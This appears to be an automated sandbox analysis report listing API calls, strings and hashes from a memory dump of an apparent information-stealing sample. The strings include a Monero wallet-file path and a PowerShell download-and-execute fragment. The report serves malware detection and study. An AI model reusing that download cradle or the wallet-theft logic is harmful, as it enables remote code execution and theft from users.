                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 61ef619446f97e74c4ee90071e67cc391ae94f2fc5ac051131a0ef52fdc4e2b8
                                • Instruction ID: 0c14404e6cd51807b9234f01bec2d95099cb00aab6f254be09f990d8a3c4f3c0
                                • Opcode Fuzzy Hash: 61ef619446f97e74c4ee90071e67cc391ae94f2fc5ac051131a0ef52fdc4e2b8
                                • Instruction Fuzzy Hash: 9F01E1F5A40208BBD700DBE4DC49FBEB7B8EB58705F104559FA09E7281D6B4A501CB91
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008B99EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 008B9A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 008B9A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,008B148F,00000000), ref: 008B9A5A
                                • LocalFree.KERNEL32(008B148F), ref: 008B9A90
                                • CloseHandle.KERNEL32(000000FF), ref: 008B9A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: d4bc8bc2152541406b436fa20dcbfee8e6601cbf5096995e29d202fbb6621b5e
                                • Instruction ID: b23b41f0420f8c62564f9014909cefeef622349f4d2afd09b62bf4e7c5504e62
                                • Opcode Fuzzy Hash: d4bc8bc2152541406b436fa20dcbfee8e6601cbf5096995e29d202fbb6621b5e
                                • Instruction Fuzzy Hash: 743107B4A00209EFDB14CF94C885BEE7BB5FF48750F108158E905A7390D778A941CFA1
                                APIs
                                • lstrcat.KERNEL32(?,007BDF38), ref: 008C47DB
                                  • Part of subcall function 008C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008C8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 008C4801
                                • lstrcat.KERNEL32(?,?), ref: 008C4820
                                • lstrcat.KERNEL32(?,?), ref: 008C4834
                                • lstrcat.KERNEL32(?,007AB008), ref: 008C4847
                                • lstrcat.KERNEL32(?,?), ref: 008C485B
                                • lstrcat.KERNEL32(?,007BD420), ref: 008C486F
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008C8D90: GetFileAttributesA.KERNEL32(00000000,?,008B1B54,?,?,008D564C,?,?,008D0E1F), ref: 008C8D9F
                                  • Part of subcall function 008C4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008C4580
                                  • Part of subcall function 008C4570: RtlAllocateHeap.NTDLL(00000000), ref: 008C4587
                                  • Part of subcall function 008C4570: wsprintfA.USER32 ref: 008C45A6
                                  • Part of subcall function 008C4570: FindFirstFileA.KERNEL32(?,?), ref: 008C45BD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                • String ID:
                                • API String ID: 2540262943-0
                                • Opcode ID: 2972278f75ed11783c3103152eace31c2c0cf109a5f3f5895b68c78cf046292e
                                • Instruction ID: 7f8c787897dd6a20ffb2d70adaec8fa9e45391ac1170de68f63c50d5407aa9a9
                                • Opcode Fuzzy Hash: 2972278f75ed11783c3103152eace31c2c0cf109a5f3f5895b68c78cf046292e
                                • Instruction Fuzzy Hash: A2316DB2940208A7CB14FBE4DC85FE97378FB58700F404589B359D6081EEB4E68ACB92
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 008C2D85
                                Strings
                                • ')", xrefs: 008C2CB3
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 008C2D04
                                • <, xrefs: 008C2D39
                                • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 008C2CC4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 3031569214-898575020
                                • Opcode ID: 024d9bb194c881dbfc8ed221d68366fb30d64e8f37e71021e01be5da8cb7bb24
                                • Instruction ID: ca416d8a0cef1569fc2d21db13cd15d217ec848ec6f4a665db748ab69f4e1d29
                                • Opcode Fuzzy Hash: 024d9bb194c881dbfc8ed221d68366fb30d64e8f37e71021e01be5da8cb7bb24
                                • Instruction Fuzzy Hash: 0941AA7181020C9BDB18EBA4D896FEDBB74FF14704F40412DE116EA192DF74AA4ACF96
                                APIs
                                • LocalAlloc.KERNEL32(00000040,?), ref: 008B9F41
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$AllocLocal
                                • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                • API String ID: 4171519190-1096346117
                                • Opcode ID: f318ede03c7213635e50086bed65f8032929fcf20df4e893a1b4aabf064102aa
                                • Instruction ID: 8bfce60ff66e59e60165875254115041cf442cfdf5de9af1e73c283031d3e373
                                • Opcode Fuzzy Hash: f318ede03c7213635e50086bed65f8032929fcf20df4e893a1b4aabf064102aa
                                • Instruction Fuzzy Hash: 2761CA71910248ABDB28EFA8DC96FED7775FF44344F408118E9099B291EB74AA06CB52
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 008C696C
                                • sscanf.NTDLL ref: 008C6999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008C69B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008C69C0
                                • ExitProcess.KERNEL32 ref: 008C69DA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: 752782222654f4c65aa250116e2ed0642ccfc3b530278bde75054062b33ab3c3
                                • Instruction ID: fc2612a625293f8d4355162cc018cf306ffa95ce72153102374b710ade847548
                                • Opcode Fuzzy Hash: 752782222654f4c65aa250116e2ed0642ccfc3b530278bde75054062b33ab3c3
                                • Instruction Fuzzy Hash: B221BCB5D14208ABCF04EFE4D945AEEB7B5FF58300F04852EE40AE3250EB749619CBA5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C7E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C7E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,007ABAB0,00000000,00020119,?), ref: 008C7E5E
                                • RegQueryValueExA.ADVAPI32(?,007BD120,00000000,00000000,000000FF,000000FF), ref: 008C7E7F
                                • RegCloseKey.ADVAPI32(?), ref: 008C7E92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 0b0eb417b6fb29cd6950c05c753f4857915c523a028d04ce115e6d8de5d523d5
                                • Instruction ID: 49916c35717fbeb5a4a478913008fe0e58a1b64902cc0949d3d23a5a760fe4ae
                                • Opcode Fuzzy Hash: 0b0eb417b6fb29cd6950c05c753f4857915c523a028d04ce115e6d8de5d523d5
                                • Instruction Fuzzy Hash: 53113AB2A44209ABD700DBD4DD49FBBBBB8FB08B10F104259F619E7280D7B49801CBA1
                                APIs
                                • StrStrA.SHLWAPI(007BDE30,?,?,?,008C140C,?,007BDE30,00000000), ref: 008C926C
                                • lstrcpyn.KERNEL32(00AFAB88,007BDE30,007BDE30,?,008C140C,?,007BDE30), ref: 008C9290
                                • lstrlen.KERNEL32(?,?,008C140C,?,007BDE30), ref: 008C92A7
                                • wsprintfA.USER32 ref: 008C92C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: dc051edb1b72c1bf3ce69f47719026479b852fb2a8b0fd5299a738cae231d1eb
                                • Instruction ID: fa1fa50a3c53d513870514a2948627216f101783893ca436611192b79e0ce3bf
                                • Opcode Fuzzy Hash: dc051edb1b72c1bf3ce69f47719026479b852fb2a8b0fd5299a738cae231d1eb
                                • Instruction Fuzzy Hash: 8E01A5B5500108FFCB04DFE8C988EEE7BB9FB58354F108548F9199B204D671AE41DB95
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B12B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008B12BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008B12D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008B12F5
                                • RegCloseKey.ADVAPI32(?), ref: 008B12FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: e60fede95dfff1b669ec4985a22323f7e93c9e4490446e2535ffdf23b1ae10cb
                                • Instruction ID: dae47a07f8f1cec66b81f89ceeac13e29c0818ccbfc23ee5023c2427bf8df915
                                • Opcode Fuzzy Hash: e60fede95dfff1b669ec4985a22323f7e93c9e4490446e2535ffdf23b1ae10cb
                                • Instruction Fuzzy Hash: A50112B9A40208BFDB00DFD0DC49FEEB7B8EB58701F008155FA09D7280D670AA01CB91
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                • Opcode ID: f0f9a46256673c8abb85680dd7d95eb50ba7acadc7577f79bbe66a29c62005cb
                                • Instruction ID: 7a00f4700b7b45851111cd1a40eb5050f4f4f21cd457a21d199fbfd6491acfcf
                                • Opcode Fuzzy Hash: f0f9a46256673c8abb85680dd7d95eb50ba7acadc7577f79bbe66a29c62005cb
                                • Instruction Fuzzy Hash: F741D5B150079C5EDB218B248C85FFB7BF8FB45708F1444ACE98AC6182E271DA49CF60
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 008C6663
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 008C6726
                                • ExitProcess.KERNEL32 ref: 008C6755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
